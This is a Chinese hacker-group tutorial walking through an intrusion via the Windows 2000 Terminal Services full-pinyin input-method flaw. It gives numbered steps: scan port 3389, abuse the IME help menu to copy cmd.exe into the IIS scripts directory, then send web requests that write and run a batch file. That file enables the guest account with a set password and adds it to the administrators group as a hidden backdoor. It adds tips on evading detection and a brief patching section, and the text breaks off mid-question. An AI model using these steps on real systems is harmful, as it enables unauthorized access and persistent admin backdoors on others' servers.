20CN网络安全小组 - 输入法漏洞之完全心得

输入法漏洞之完全心得

由于微软对中国产品不付责任的态度，使得安装了终端服务和全拼（^^我只在全拼下成
功）的w2k 服务器
存在着远程登陆并能获取超级用户权限的严重漏洞。
小女子几经周折、胆战心惊、多次尝试，终于明白个中道理，不需上传任何文件成功
入侵并装好后门（

嘻，现在流行走后门^^）。

其过程如下：

1.扫描 3389 port 终端服务默认；
2.用终端客户端程序进行连接；
3.按ctrl+shift调出全拼输入法（其他似乎不行），点鼠标右键（如果其帮助菜单发灰，就
赶快赶下家吧，人

家打补丁了），点帮助，点输入法入门；
4.在"选项"菜单上点右键--->跳转到URL"，输入：c:\winnt\system32\cmd.exe.（如果不能
确定NT系统目录，

则输入：c:\ 或d:\ ……进行查找确定）；
5.选择"保存到磁盘" 选择目录：c:\inetpub\scripts\，因实际上是对方服务器上文件自身
的复制操作，所以

这个过程很快就会完成；
6.打开IE，输入： http://ip/scripts/cmd.exe?/c dir 怎么样？有cmd.exe文件了吧？好我
们继续；
7. http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat
8. http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat
9. http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go
.bat
10. http://ip/scripts/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下：

net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
如果不是，可能那步操作有误哦！
11.在"选项"菜单上点右键--->跳转到URL"，输入：c:\inetpub\scripts\go.bat --->在磁盘
当前位置执行；
12.呵呵，大功告成啦，这样我们就激活了服务器的geust帐户，密码为：elise，超级用户呢
！（我喜欢guest

而不是建立新帐户，这样似乎不易被发现些），这样你就可用IPC$连接，想怎样做就怎样做
了，当然，你也可

名正言顺的用guest直接登陆到他的服务器，到他机器上去跳舞啦：）

注意事项：
1.当你用终端客户端程序登陆到他的服务器时，你的所有操作不会在他的机器上反应出来，
但如果他正打开了

终端服务管理器，你就惨了了：（这时他就能看到你所打开的进程id、程序映象，你的ip及
机器名，并能发消

息给你呢！
2.当你连接时，会加重对方服务器的负荷，非常容易造成对方死机和断线，所以你的操作快
点为妙，小女子为

此不知浪费了多少的网费和精力。
3.尽快做好后门，暂时不要上传任何程序，一是防止断线，二是防止对方打上补丁！小女子
可就这样吃亏过一

次，上传木马中断没有完成，第二天，人家已打上补丁，再也无法进入！并且还留下了xxxx
……：（
4.此法与对方的防火墙无关，放心使用吧。

个人观点：
1.在IE下，所拥有的只是iusr_machine权限，因而，你不要设想去做越权的事情，如启动te
lnet、木马等；
2.url的跳转下，你将拥有超级用户的权限，好好利用吧：）
3.跳转到哪个目录下，通常只能查看、执行当前目录的文件，不能进入到子目录，如想进入
，再跳一次吧！：

）

堵漏办法：
1.打补丁；
2.删掉全拼输入法，用标准就成了嘛^^；
3.服务中关掉：Terminal Services，服务名称：TermService，对应程序名：system32\ter
msrv.exe；（如果

哪天你潜入服务器，发现了termsrv.exe文件，而又没探测到3389端口，你知道该怎样做了吧
？^^）

问题（高手请赐教）：
1.如果IE下的www访问需要密码，怎办？
2.如果对方不开www服务怎办？我试过了直接跳转url:net user hack elise /add命令�